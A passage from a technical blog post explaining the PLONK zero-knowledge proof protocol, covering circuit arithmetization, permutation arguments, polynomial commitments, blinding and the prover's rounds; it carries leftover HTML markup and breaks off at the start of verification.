8</td> -</td> -</td></tr>
2</td> 3</td> 8</td></tr>
8</td> 8</td> -</td></tr>
</tbody></table>
With these extra rows, equations add up to zero only for valid executions of the program with input $3$ and output $8$.</p>
An astute observer would notice that the matrix $Q$ is no longer independent of the specific evaluation by incorporating these new rows. This is because the first two rows of the $Q_C$ column contain concrete values specific to a particular execution instance. We can remove these values and consider them as part of an extra one-column matrix called $PI$ (stands for Public Input) to maintain independence. This column has zeros in all rows not related to public inputs. We put zeros in the $Q_C$ columns. The prover and verifier are responsible for filling in the $PI$ matrix. In our example, it is</p>
$PI$</h2>
3

8

0

0</p>
And the final $Q$ matrix is</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

-1</td> 0</td> 0</td> 0</td> 0</td></tr>
-1</td> 0</td> 0</td> 0</td> 0</td></tr>
1</td> 1</td> 1</td> -1</td> 1</td></tr>
1</td> -1</td> 0</td> 0</td> 0</td></tr>
</tbody></table>
We ended up with two matrices that depend only on the program, $Q$ and $V$, and two matrices that depend on a particular evaluation, namely the $ABC$ and $PI$ matrices. The updated version of the claim is the following:</p>
Claim:</strong> Let $T$ be a matrix with columns $A, B, C$. It corresponds to an evaluation of the circuit if and only if</p>
    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$</span></span>
    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$.</span></span></code></pre>From matrices to polynomials</h3>
The previous section showed how the arithmetization process works in PLONK. For a program with $n$ public inputs and $m$ gates, we constructed two matrices $Q$ and $V$ of sizes $(n + m + 1) \times 5$ and $(n + m + 1) \times 3$ that satisfy the following. Let $N = n + m + 1.$</p>
Claim:</strong> Let $T$ be a $N \times 3$ matrix with columns $A, B, C$ and $PI$ a $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if</p>
    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$</span></span>
    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$</span></span>
    3. $PI_i = 0$ for all $i>n$.</span></span></code></pre>
Polynomials enter now to squash most of these equations. We will traduce the set of all equations in conditions (1) and (2) to just a few equations on polynomials.</p>
Let $\omega$ be a primitive $N$-th root of unity and let $H = {\omega^i: 0\leq i < N}$. Let $a, b, c, q_L, q_R, q_M, q_O, q_C, pi$ be the polynomials of degree at most $N$ that interpolate the columns $A, B, C, Q_L, Q_R, Q_M, Q_O, Q_C, PI$ at the domain $H$. This means for example that $a(\omega^i) = A_i$ for all $i$, and similarly for all the other columns (see our previous post on STARKs</a> for examples on interpolation).</p>
With this, condition (1) of the claim is equivalent to $$a(x) q_L(x) + b(x) q_R(x) + a(x) b(x) q_M(x) + c(x) q_O(x) + q_c(x) + pi(x) = 0$$ for all $x$ in $H$.This is just by definition of the polynomials. But in polynomials land, this is also equivalent to:</p>
    1. There exists a polynomial $t$ such that $$a q_L + b q_R + a b q_M + c q_O + q_c + pi = z_H t$$, where $z_H$ is the polynomial $X^N -1$.</span></span></code></pre>
To reduce condition (2) to polynomial equations, we must introduce the concept of permutation. A permutation is a rearrangement of a set, usually denoted $\sigma$. For finite sets, it is a map from a set to itself that takes all values. In our case, the set will be the set of all pairs

$$I={(i,j): \text{ such that }0\leq i < N, \text{ and } 0\leq j < 3}$$

The matrix $V$ induces a permutation of this set where $\sigma((i,j))$ is equal to the indices of the next</em> occurrence of the value at position $(i,j)$. If you are already at the last occurrence, go to the first one. By next</em> , we mean the following occurrence, as if the columns were stacked on each other. Let’s see how this works in the example circuit. Recall $V$ is</p>
L</th> R</th> O</th></tr></thead>

0</td> -</td> -</td></tr>
1</td> -</td> -</td></tr>
2</td> 0</td> 3</td></tr>
1</td> 3</td> -</td></tr>
</tbody></table>
The permutation in this case is the map $\sigma((0,0)) = (2,1)$, $\sigma((0,1)) = (0, 3)$, $\sigma((0,2)) = (0,2)$, $\sigma((0,3)) = (0,1)$, $\sigma((2,1)) = (0,0)$, $\sigma((3,1)) = (2,2)$, $\sigma((2,2)) = (3,1)$. The positions with -</code> values don’t matter right now.</p>
It’s not hard to see that condition (2) is equivalent to: for all $(i,j)\in I$, $T_{i,j} = T_{\sigma((i,j))}$.</p>
A little less obvious is that this condition is, in turn, equivalent to checking whether the following sets $A$ and $B$ are equal

$$A = \{((i,j), T_{i,j}): (i,j) \in I\}$$

$$B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}.$$

The proof of this equivalence is straightforward. Give it a try!</p>
In our example, the sets in question are respectively

$$

\begin{aligned}

\{((0,0), T_{ 0,0 }), ((0,1), T_{ 0,1 }), ((0,2), T_{ 0,2 }), ((0,3), T_{ 0,3 }), \newline ((2,1), T_{ 2,1 }), ((3,1), T_{ 3,1 }), ((2,2), T_{ 2,2 })\}

\end{aligned}

$$

and

$$

\begin{aligned}

\{((2,1), T_{0,0}), ((0,3), T_{0,1}), ((0,2), T_{0,2}), ((0,1), T_{0,3}), \newline ((0,0), T_{2,1}), ((2,2), T_{3,1}), ((3,1), T_{2,2}) \}, \end{aligned}

$$</p>
You can check these sets coincide by inspection. Recall our trace matrix $T$ is</p>
A</th> B</th> C</th></tr></thead>

3</td> -</td> -</td></tr>
8</td> -</td> -</td></tr>
2</td> 3</td> 8</td></tr>
8</td> 8</td> -</td></tr>
</tbody></table>
Checking the equality of these sets can be reduced to polynomial equations. It is a very nice method that PLONK uses. To understand it better, let’s start with a more straightforward case.</p>
Equality of sets</h4>
Suppose we have two sets $A = \{a_0, a_1 \}$ $B = \{b_0, b_1\}$ of two field elements in $\mathbb{F}$. And we are interested in checking whether they are equal.</p>
One thing we could do is compute $a_0a_1$ and $b_0b_1$ and compare them. If the sets are equal, then those elements are necessarily identical.</p>
But the converse is not true. For example the sets $A = \{4, 15\}$ and $B = \{6, 10\}$ both have $60$ as the result of the product of their elements. But they are not equal. So this is not good for checking equality.</p>
Polynomials come to the rescue here. What we can do instead is consider the following sets of polynomials</em> $A’ = \{a_0 + X, a_1 + X\}$, $B’ = \{b_0 + X, b_1 + X \}$. Sets $A$ and $B$ are equal if and only if sets $A’$, and $B’$ are equal. This is because the equality of polynomials boils down to the equality of their coefficients. But the difference between $A’$ and $B’$ is that the approach of multiplying the elements works now. That is, $A’$ and $B’$ are equal if and only if $(a_0 + X)(a_1 + X) = (b_0 + X)(b_1 + X)$. This is not entirely evident but follows from a property that polynomials have called unique factorization</em>. Here the important fact is that linear polynomials act like prime factors. Anyway, you can take that for granted. The last part of this trick is using the Schwartz-Zippel lemma and returning to the land of field elements. That means, if for some random element $\gamma$ we have $(a_0 + \gamma)(a_1 + \gamma) = (b_0 + \gamma)(b_1 + \gamma)$, then with overwhelming probability the equality $(a_0 + X)(a_1 + X) = (b_0 + X)(b_1 + X)$ holds.</p>
Putting this altogether, if for some random element $\gamma$ we have $(a_0 + \gamma)(a_1 + \gamma) = (b_0 + \gamma)(b_1 + \gamma)$, then the sets $A$ and $B$ are equal. Of course, this also holds for sets with more than two elements. Let’s write that down.</p>
Fact:</em> Let $A = \{a_0, \dots, a_{k-1} \}$ and $B = \{b_0, \dots, b_{k-1} \}$ be sets of field elements. If, for some random $\gamma$ the following equality holds

$$\prod_{i = 0}^{ k - 1}(a_i + \gamma) = \prod_{i = 0}^{ k - 1 }(b_i + \gamma),$$

then with overwhelming probability $A$ is equal to $B$.</p>
And here comes the trick that reduces this check to polynomial equations. Let

$H$ be a domain of the form $\{1, \omega, \dots, \omega^{k - 1} \}$ for some primitive $k$-th root of unity $\omega$. Let $f$ and $g$ be the polynomials that interpolate the following values at $H$.

$$(a_0 + \gamma, \dots, a_{k-1} + \gamma),$$

$$(b_0 + \gamma, \dots, b_{k-1} + \gamma),$$</p>
Then $\prod_{i = 0}^{ k - 1}(a_i + \gamma)$ equals $\prod_{ i = 0}^{ k - 1}(b_i + \gamma)$ if and only if there exists a polynomial $Z$ such that

$$Z(\omega^0) = 1$$

$$Z(h)f(h) = g(h)Z(\omega h)$$

for all $h\in H$.</p>
Let’s see why. Suppose that $\prod_{i = 0}^{ k - 1}(a_i + \gamma)$ equals $\prod_{i = 0}^{ k - 1}(b_i + \gamma)$. Construct $Z$ as the polynomial that interpolates the following values $$(1, \frac{a_0 + \gamma}{b_0 + \gamma}, \frac{(a_0 + \gamma)(a_1 + \gamma)}{(b_0 + \gamma)(b_1 + \gamma)}, \dots, \prod_{i=0}^{k-2} \frac{a_i + \gamma}{b_i + \gamma}),$$

in the same domain as $f$ and $g$. That works. Conversely, suppose such a polynomial $Z$ exists. By evaluating the equation $Z(X)f(X) = g(X)Z(\omega X)$ at $1, \omega, \dots, \omega^{k-2}$ and using recursion we get that $Z(\omega^{k-1}) = \prod_{i = 0}^{k - 2}(a_i + \gamma)/\prod_{i = 0}^{k - 2}(b_i + \gamma)$. Moreover, evaluating it at $\omega^{k-1}$ we obtain that $$Z(\omega^{k - 1})\frac{f(\omega^{k - 1} )}{g(\omega^{ k - 1 })} = Z(\omega^k ) = Z(w^0 ) = 1.$$

The second equality holds because $\omega^k = \omega^0$ since it is a $k$-th root of unity. Expanding with the values of $f, g$ and $Z$ one obtains that $\prod_{i = 0}^{k - 1}(a_i + \gamma)/\prod_{i = 0}^{k - 1}(b_i + \gamma)$ equals $1$. Which is what we wanted.</p>
In summary. We proved the following:</p>
Fact:</em> Let $A = \{a_0, \dots, a_{k-1} \}$ and $B = \{b_0, \dots, b_{k-1} \}$ be sets of field elements. Let $\gamma$ be a random field element. Let $\omega$ be a primitive $k$-th root of unity and $H = \{1, \omega, \omega^2, \dots, \omega^{k-1} \}$. Let $f$ and $g$ be respectively the polynomials that interpolate the values $\{a_0 + \gamma, \dots, a_{k-1} + \gamma \}$ and $\{ b_0 + \gamma, \dots, b_{k-1} + \gamma \}$ at $H$. If there exists a polynomial $Z$ such that

$$Z(\omega^0 ) = 1$$

$$Z(X)f(X) = g(X)Z(\omega X)$$

for all $h\in H$, then with overwhelming probability the sets $A$ and $B$ are equal.</p>
Sets of tuples</h4>
In the previous section, we saw how to check whether two sets of field elements are equal using polynomial equations. To use it in our context, we need to extend it to groups of tuples of field elements. This is pretty straightforward.</p>
Let’s start with the easy case. Let $A = \{(a_0, a_1), (a_2, a_3) \}$ and $B = \{(b_0, b_1), (b_2, b_3)\}$ be two sets of pairs of field elements. That is $a_i, b_i \in \mathbb{F}$ for all $i$. The trick is very similar to the previous section.

$$A’ = \{a_0 + a_1 Y + X, a_2 + a_3 Y + X \}$$

$$B’ = \{b_0 + b_1 Y + X, b_2 + b_3 Y + X \}$$</p>
Just as before, by looking at coefficients, we can see that the sets $A$ and $B$ are equal if and only if $A’$ and $B’$ are equal.

And notice that these are sets of polynomials: we got rid of the tuples! Now, the situation is very similar to the previous section. We have that $A’$ and $B’$ are equal if and only if the product of their elements coincides. This is also true because polynomials in two variables are a unique factorization domain. So as before, we can use the Schwartz-Zippel lemma. Precisely, if for random $\beta, \gamma$, the elements

$$(a_0 + \beta a_1 + \gamma)(a_2 + \beta a_3 + \gamma),$$

and

$$(b_0 + \beta b_1 + \gamma)(b_2 + \beta b_3 + \gamma)$$

coincide, then $A$ and $B$ are equal with overwhelming probability.</p>
Here is the statement for sets of more than two pairs of field elements.</p>
Fact:</em> Let $A = \{\bar a_0, \dots, \bar a_{k-1} \}$ and $B = \{\bar b_0, \dots, \bar b_{k-1} \}$ be sets of pairs of field elements. So that $\bar a_i = (a_{i,0}, a_{i,1})$ and the same for $\bar b_i$. Let $\beta, \gamma$ be random field elements. Let $\omega$ be a $k$-th root of unity and $H = \{1, \omega, \omega^2, \dots, \omega^{k-1} \}$. Let $f$ and $g$ be, respectively, the polynomials that interpolate the values

$$\{a_{i,0} + a_{i,1}\beta + \gamma, \dots, a_{k-1,0} + a_{k-1,1}\beta + \gamma\},$$

and

$$\{b_{i,0} + b_{i,1}\beta + \gamma, \dots, b_{k-1,0} + b_{k-1,1}\beta + \gamma\},$$

at $H$. If there exists a polynomial $Z$ such that

$$Z(\omega^0 ) = 1$$

$$Z(X)f(X) = g(X)Z(\omega X)$$

for all $h\in H$, then with overwhelming probability the sets $A$ and $B$ are equal.</p>
Going back to our case</h4>
Recall we want to rephrase condition (b) in terms of polynomials. We have already seen that condition (b) is equivalent to $A$ and $B$ being equal, where

$$A = \{((i,j), T_{i,j}): (i,j) \in I\}$$

and

$$B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}.$$</p>
We cannot directly use the facts of the previous sections because our sets are not sets of field elements, nor are they sets of pairs of field elements. They are sets of pairs with some indexes $(i,j)$ in the first coordinate and a field element $v$ in the second one. So the solution is to convert them to sets of pairs of field elements and apply the result of the previous section. How do we map an element of the form $((i,j), v)$ to something of the form $(a_0, a_1)$ with $ a_0 $ and $ a_1 $ field elements? The second coordinate is trivial: we can leave $v$ as it is and take $a_1 = v$. There are multiple ways for the indexes pair $(i,j)$. The important thing to achieve here is that different pairs get mapped to different field elements. Recall that $i$ ranges from $0$ to $N-1$ and $j$ ranges from $0$ to $2$. One way is to take a $3N$-th primitive root of unity $\eta$ and define $a_0 = \eta^{3i + j}$. Putting it all together, we are mapping the pair $((i,j), v)$ to the pair $(\eta^{3i + j}, v)$, which is a pair of field elements. Now we can consider the sets

$$A = \{(\eta^{3i + j}, T_{i,j}): (i,j) \in I\}$$

and

$$B = \{(\eta^{3k + l}, T_{i,j}): (i,j) \in I, \sigma((i,j)) = (k, l)\}.$$

We have that condition (b) is equivalent to $A$ and $B$ being equal.</p>
Applying the method of the previous section to these sets, we obtain the following.</p>
Fact:</em> Let $\eta$ be a $3N$-th root of unity and $\beta$ and $\gamma$ random field elements. Let $D = \{1, \eta, \eta^2, \dots, \eta^{3N-1}\}$. Let $f$ and $g$ be the polynomials that interpolate, respectively, the following values at $D$:

$$\{T_{i,j} + \eta^{3i + j}\beta + \gamma: (i,j) \in I\},$$

and

$$\{T_{i,j} + \eta^{3k + l}\beta + \gamma: (i,j) \in I, \sigma((i,j)) = (k,l)\},$$

Suppose there exists a polynomial $Z$ such that

$$Z(\eta^0 ) = 1$$

$$Z(d)f(d) = g(d)Z(\eta d),$$

for all $h\in D$.

Then the sets $A = \{((i,j), T_{i,j}): (i,j) \in I \}$ and $B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}$ are equal with overwhelming probability.</p>
One last-minute definition. Notice that $\omega=\eta^3$ is a primitive $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$.</p>
Define $S_{\sigma 1}$ to be the interpolation at $H$ of

$$\{\eta^{3k + l}: (i,0) \in I, \sigma((i,0)) = (k,l)\},$$

Similarly define $S_{\sigma 2}$ and $S_{\sigma 3}$ to be the interpolation at $H$ of the sets of values

$$\{\eta^{3k + l}: (i,1) \in I, \sigma((i,1)) = (k,l)\},$$

$$\{\eta^{3k + l}: (i,2) \in I, \sigma((i,2)) = (k,l)\},$$

These will be useful during the protocol to work with such polynomials $Z$ and the above equations.</p>
A more compact form</h4>
The last fact is equivalent to the following. There’s no new idea here, just a more compact form of the same thing that allows the polynomial $Z$ to be of degree at most $N$.</p>
Fact:</em> Let $\omega$ be a $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$. Let $k_1$ and $k_2$ be two field elements such that $\omega^i \neq \omega^jk_1 \neq \omega^l k_2$ for all $i,j,l$. Let $\beta$ and $\gamma$ be random field elements. Let $f$ and $g$ be the polynomials that interpolate, respectively, the following values at $H$:

$$\{(T_{0,j} + \omega^{i} \beta + \gamma) (T_{1,j} + \omega^{i} k_1 \beta + \gamma) (T_{2,j} + \omega^{i} k_2\beta + \gamma): 0\leq i<N\},$$

and

$$\{(T_{0,j} + S_{\sigma1}(\omega^i)\beta + \gamma)(T_{0,j} + S_{\sigma2}(\omega^i)\beta + \gamma)(T_{0,j} + S_{\sigma3}(\omega^i)\beta + \gamma): 0\leq i<N\},$$

Suppose there exists a polynomial $Z$ such that

$$Z(\omega^0) = 1$$

$$Z(d)f(d) = g(d)Z(\omega d),$$

for all $h\in D$.

Then the sets $A = \{((i,j), T_{i,j}): (i,j) \in I\}$ and $B = \{(\sigma((i,j)), T_{i,j}): (i,j) \in I\}$ are equal with overwhelming probability.</p>
Common preprocessed input</h2>
We have arrived at the eight polynomials we mentioned at the beginning:

$$q_L, q_R, q_M, q_O, q_C, S_{\sigma 1}, S_{\sigma 2}, S_{\sigma 3}.$$</p>
These are what’s called the common preprocessed input</em>.</p>
Wrapping up the whole thing</h2>
Let’s wrap up what we have so far. We started with a program. It can be seen as a sequence of gates with left, right, and output values. That’s called a circuit. From this, two matrices, $Q$, and $V$, can be computed to capture the gates logic.</p>
Executing the circuit leaves us with matrices $T$ and $PI$, called the trace matrix and the public input matrix, respectively. Everything we want to prove boils down to verifying that such matrices are valid. And we have the following result.</p>
Fact:</strong> Let $T$ be a $N \times 3$ matrix with columns $A, B, C$ and $PI$ a $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if</p>
    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} + PI_i = 0,$$</span></span>
    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k,l}$ we have $T_{i,j} = T_{k,l}$, c) $PI_i = 0$ for all $i>n$.</span></span></code></pre>
Then we constructed polynomials $q_L, q_R, q_M, q_O, q_C, S_{\sigma1},S_{\sigma2}, S_{\sigma3}$, $f$, $g$ from the matrices $Q$ and $V$. They result from interpolating at a domain $H = \{1, \omega, \omega^2, \dots, \omega^{N-1}\}$ for some $N$-th primitive root of unity and a few random values. We also constructed polynomials $a,b,c, pi$ from the matrices $T$ and $PI$. The above fact can be reformulated in terms of polynomial equations as follows.</p>
Fact:</strong> Let $z_H = X^N - 1$. Let $T$ be a $N \times 3$ matrix with columns $A, B, C$ and $PI$ a $N \times 1$ matrix. They correspond to a valid execution instance with public input given by $PI$ if and only if</p>
    1. There is a polynomial $t_1$ such that the following equality holds $$a q_L + b q_R + a b q_M + c q_O + q_C + pi = z_H t_1,$$</span></span>
</span>
    2. There are polynomials $t_2, t_3$, $z$ such that $zf - gz' = z_H t_2$ and $(z-1)L_1 = z_H t_3$, where $z'(X) = z(X\omega)$</span></span></code></pre>
You might be wondering where the polynomials $t_i$ came from. Recall that for a polynomial $F$, we have $F(h) = 0$ for all $h \in H$ if and only if $F = z_H t$ for some polynomial $t$.</p>
Finally, both conditions (a) and (b) are equivalent to a single equation (c) if we let more randomness come into play. This is:</p>
    3. Let $\alpha$ be a random field element. There is a polynomial $t$ such that  </span></span></code></pre>
$$

\begin{aligned}

z_H t &= a q_L + b q_R + a b q_M + c q_O + q_C + pi \newline

&= \alpha(gz’ - fz) \newline

&= \alpha^2(z-1)L_1 \newline

\end{aligned}

$$</p>
This last step is not obvious. You can check the paper to see the proof. Anyway, this is the equation you’ll recognize below in the protocol description.</p>
Randomness is a delicate matter, and an essential part of the protocol is where it comes from, who chooses it, and when they choose it. We are now ready to jump into the protocol.</p>
Protocol</h2>
Details and tricks</h2>
Polynomial commitment scheme</h3>
A polynomial commitment scheme (PCS) is a cryptographic tool that allows one party to commit to a polynomial and later prove some properties of that polynomial.

This commitment polynomial hides the original polynomial’s coefficients and can be publicly shared without revealing any information about the original polynomial.

Later, the party can use the commitment to prove specific properties of the polynomial, such as that it satisfies certain constraints or evaluates to a particular value at a specific point.</p>
For the moment, we only need the following about it:</p>
It consists of a finite group $\mathbb{G}$ and the following algorithms:</p>
    * **Commit($f$)** : This algorithm takes a polynomial $f$ and produces an element of the group $\mathbb{G}$. It is called the commitment of $f$ and is denoted by $[f]$. It is homomorphic in the sense that $[f + g] = [f] + [g]$. The former sum is the addition of polynomials. The latter is the addition operation in the group $\mathbb{G}$.</span></span>
    * **Open($f$,$\zeta$)** : It takes a polynomial $f$ and a field element $\zeta$ and produces an element $\pi$ of the group $\mathbb{G}$. This element is an opening proof for $f(\zeta)$. It is the proof that $f$ evaluated at $\zeta$ gives $f(\zeta)$.</span></span>
    * **Verify($[f]$, $\pi$, $\zeta$, $y$)** : It takes group elements $[f]$ and $\pi$, and also field elements $\zeta$ and $y$. With overwhelming probability, it outputs _Accept_ if $f(z)=y$ and _Reject_ otherwise.</span></span></code></pre>
By changing the PCS, you can get different versions of PLONK, each with its advantages and disadvantages (such as shorter proofs, plausibly post-quantum secure, lack of trusted setup, etc).</p>
Blindings</h3>
As you will see in the protocol, the prover reveals the value taken by a bunch of the polynomials at a random $\zeta$. For the protocol to be Honest Verifier Zero Knowledge</em> , these polynomials must be blinded</em>. This process makes the values of these polynomials at $\zeta$ seemingly random by forcing them to be of a certain degree. Here’s how it works.</p>
Let’s take, for example, the polynomial $a$ the prover constructs. This results from interpolating the first column of the trace matrix $T$ at the domain $H$.

This matrix has all of the left operands of all the gates. The prover wishes to keep them secret.

Say the trace matrix $T$ has $N$ rows, and so $H$ is $\{1, \omega,\omega^2, \dots, \omega^{N-1} \}$. The invariant that the prover cannot violate is that $a_{\text{blinded}}(\omega^i)$ must take the value $T_{0, i}$, for all $i$. This is what the interpolation polynomial $a$ satisfies and is the unique such polynomial of degree at most $N-1$ with such property. But for higher degrees, there are many such polynomials.</p>
The blinding</em> process takes $a$ and a desired degree $M\geq N$ and produces a new polynomial $a_{\text{blinded}}$ of degree exactly $M$. This new polynomial satisfies that $a_{\text{blinded}}(\omega^i) = a(\omega^i)$ for all $i$. But outside $H$ differs from $a$.</p>
This may seem hard, but it’s very simple. Let $z_H$ be the polynomial $z_H = X^N - 1$. If $M=N+k$, with $k\geq 0$, then sample random values $b_0, \dots, b_k$ and define

$$ a_{\text{blinded}} := (b_0 + b_1 X + \cdots + b_k X^k)z_H + a $$</p>
This does the job because $z_H(\omega^i)=0$ for all $i$. Therefore the added term vanishes at $H$ and leaves the values of $a$ at $H$ unchanged.</p>
Linearization trick</h3>
This is an optimization in PLONK to reduce the number of checks of the verifier.</p>
One of the primary checks in PLONK boils down to checking that $p(\zeta) = z_H(\zeta) t(\zeta)$, with $p$ some polynomial that looks like $p = a q_L + b q_R + ab q_M + \cdots$, and so on. In particular, the verifier needs to get the value $p(\zeta)$ from somewhere.</p>
For the sake of simplicity, in this section, assume $p$ is exactly $a q_L + bq_R$. Secret to the prover here is only $a, b$. The polynomials $q_L$ and $q_R$ are also known to the verifier. The verifier will already have the commitments $[a], [b], [q_L]$ and $[q_R]$. So the prover could send just $a(\zeta)$, $b(\zeta)$ along with their opening proofs and let the verifier compute by himself $q_L(\zeta)$ and $q_R(\zeta)$. Then with all these values the verifier could compute $p(\zeta) = a(\zeta)q_L(\zeta) + b(\zeta)q_R(\zeta)$. And also use his commitments to validate the opening proofs of $a(\zeta)$ and $b(\zeta)$.</p>
This has the problem that computing $q_L(\zeta)$ and $q_R(\zeta)$ is expensive. Instead, the prover can save the verifier this by sending $q_L(\zeta), q_R(\zeta)$ along with opening proofs. Since the verifier will have the commitments $[q_L]$ and $[q_R]$ beforehand, he can check that the prover is not cheating and cheaply be convinced that the claimed values are $q_L(\zeta)$ and $q_R(\zeta)$. This is much better. It involves the check of four opening proofs and the computation of $p(\zeta)$ from the values received from the prover. But it can be further improved as follows.</p>
As before, the prover sends $a(\zeta), b(\zeta)$ along with their opening proofs. She constructs the polynomial $f = a(\zeta)q_L + b(\zeta)q_R$. She sends the value $f(\zeta)$ along with an opening proof of it. Notice that the value of $f(\zeta)$ is exactly $p(\zeta)$. The verifier can compute by himself $[f]$ as $a(\zeta)[q_L] + b(\zeta)[q_R]$. The verifier has everything to check all three openings and is convinced that the claimed value $f(\zeta)$ is true, and this value is $p(\zeta)$. So this means no more work for the verifier. And the whole thing got reduced to three openings.</p>
This is called the linearization trick. The polynomial $f$ is called the linearization</em> of $p$.</p>
Setup</h2>
There’s a one-time setup phase to compute some values common to any execution and proof of the particular circuit. Precisely, the following commitments are calculated and published.

$$\left[ q_L \right] , \left[ q_R \right] , \left[ q_M \right] , \left[ q_O \right] , \left[ q_C \right] , \left[ S_{ \sigma 1} \right] , \left[ S_{ \sigma 2} \right] , \left[ S_{ \sigma 3} \right]$$</p>
Proving algorithm</h2>
Next, we describe the proving algorithm for a program of size $N$, that includes public input. Let $\omega$ be a primitive $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1} \}$. Define $Z_H := X^N - 1$.</p>
Assume the eight polynomials of common preprocessed input are already given.</p>
The prover computes the trace matrix $T$ as described in the first sections. That means the first rows correspond to the public inputs. It should be a $N \times 3$ matrix.</p>
Round 1</h3>
Add to the transcript the following:

$$[S_{\sigma1}] , [S_{\sigma2}] , [S_{\sigma3} ] , [q_L] , [q_R] , [q_M] , [q_O] , [q_C]$$</p>
Compute polynomials $a’,b’,c’$ as the interpolation polynomials of the columns of $T$ at the domain $H$.

Sample random $b_1, b_2, b_3, b_4, b_5, b_6$

Let</p>
$a := (b_1X + b_2)Z_H + a’$</p>
$b := (b_3X + b_4)Z_H + b’$</p>
$c := (b_5X + b_6)Z_H + c’$</p>
Compute $[a], [b], [c]$ and add them to the transcript.</p>
Round 2</h3>
Sample $\beta, \gamma$ from the transcript.</p>
Let $z_0 = 1$ and define recursively for $0\leq k < N$.</p>
$$

z_{k+1} = z_k \frac{(a_k + \beta\omega^k + \gamma)(b_k + \beta\omega^k k_1 + \gamma)(c_k + \beta\omega^k k_2 + \gamma)}{(a_k + \beta S_{\sigma1}(\omega^k) + \gamma)(b_k + \beta S_{\sigma2}(\omega^k) + \gamma)(c_k + \beta S_{\sigma3}(\omega^k) + \gamma)}

$$</p>
Compute the polynomial $z’$ as the interpolation polynomial at the domain $H$ of the values $(z_0, \dots, z_{N-1})$.</p>
Sample random values $b_7, b_8, b_9$ and let $z = (b_7X^2 + b_8X + b_9)Z_H + z’$.</p>
Compute $[z]$ and add it to the transcript.</p>
Round 3</h3>
Sample $\alpha$ from the transcript.</p>
Let $pi$ be the interpolation of the public input matrix $PI$ at the domain $H$.</p>
Let</p>
$$

\begin{aligned}

p_1 &= aq_L + bq_R + abq_M + cq_O + q_C + pi \newline

p_2 &= (a + \beta X + \gamma)(b + \beta k_1 X + \gamma)(c + \beta k_2 X + \gamma)z - (a + \beta S_{\sigma1} + \gamma)(b + \beta S_{\sigma2} + \gamma)(c + \beta S_{\sigma3} + \gamma)z(\omega X)\newline

p_3 &= (z - 1)L_1

\end{aligned}

$$</p>
and define $p = p_1 + \alpha p_2 + \alpha^2 p_3$. Compute $t$ such that $p = t Z_H$. Write $t = t_{lo}’ + X^{N+2} t_{mid}’ + X^{2(N+2)} t_{hi}’$ with $t_{lo} ’, t_{mid} ’$ and $t_{hi} ’$ polynomials of degree at most $N+1$.</p>
Sample random $b_{10}, b_{11}$ and define</p>
$$

\begin{aligned}

t_{lo} &= t_{lo}’ + b_{10}X^{N+2} \newline

t_{mid} &= t_{mid}’ - b_{10} + b_{11}X^{N+2} \newline

t_{hi} &= t_{hi}’ - b_{11}

\end{aligned}

$$</p>
Compute $[t_{lo}] , [t_{mid} ] , [t_{hi} ]$ and add them to the transcript.</p>
Round 4</h3>
Sample $\zeta$ from the transcript.</p>
Compute $\bar a = a(\zeta), \bar b = b(\zeta), \bar c = c(\zeta), \bar s_{\sigma1} = S_{\sigma1}(\zeta), \bar s_{\sigma2} = S_{\sigma2}(\zeta), \bar z_\omega = z(\zeta\omega)$ and add them to the transcript.</p>
Round 5</h3>
Sample $\upsilon$ from the transcript.</p>
Let</p>
$$

\begin{aligned}

\hat p_{nc1} &= \bar aq_L + \bar bq_R + \bar a\bar bq_M + \bar cq_O + q_C \newline

\hat p_{nc2} &=(\bar a + \beta\zeta + \gamma)(\bar b + \beta k_1\zeta + \gamma)(\bar c + \beta k_2\zeta + \gamma)z - (\bar a + \beta \bar s_{\sigma1} + \gamma)(\bar b + \beta \bar s_{\sigma2} + \gamma)\beta \bar z_\omega S_{\sigma3} \newline

\hat p_{nc3} &= L_1(\zeta) z

\end{aligned}

$$</p>
Define</p>
$$

\begin{aligned}

p_{nc} &= p_{nc1} + \alpha p_{nc2} + \alpha^2 p_{nc3} \newline

t_{\text{partial}} &= t_{lo} + \zeta^{N+2}t_{mid} + \zeta^{2(N+2)}t_{hi}

\end{aligned}

$$</p>
The subscript $nc$ stands for “nonconstant,” as it is the part of the linearization of $p$ with nonconstant factors. The subscript “partial” indicates that it is a partial evaluation of $t$ at $\zeta$. Partial means that only some power of $X$ is replaced by the powers of $\zeta$. So in particular $t_{\text{partial}}(\zeta) = t(\zeta)$.</p>
Let $\pi_{\text{batch}}$ be the opening proof at $\zeta$ of the polynomial $f_{\text{batch}}$ defined as

$$t_{\text{partial}} +\upsilon p_{nc} + \upsilon^2 a + \upsilon^3 b + \upsilon^4 c + \upsilon^5 S_{\sigma1} + \upsilon^6 S_{\sigma2}$$</p>
Let $\pi_{\text{single}}$ be the opening proof at $\zeta\omega$ of the polynomial $z$.</p>
Compute $\bar p_{nc} := p_{nc}(\zeta)$ and $\bar t = t(\zeta)$.</p>
Proof</h3>
The proof is:

$$[a], [b], [c], [z], [t_{lo}], [t_{mid}], [t_{hi}], \bar a, \bar b, \bar c, \bar s_{\sigma1}, \bar s_{\sigma 2}, \bar z_\omega, \pi_{\text{batch}}, \pi_{\text{single}}, \bar p_{nc}, \bar t$$</p>
Verification algorithm</h2>
Transcript initialization</h3>
The first step is to initialize the transcript the same way the prover did, adding to it the following elements.

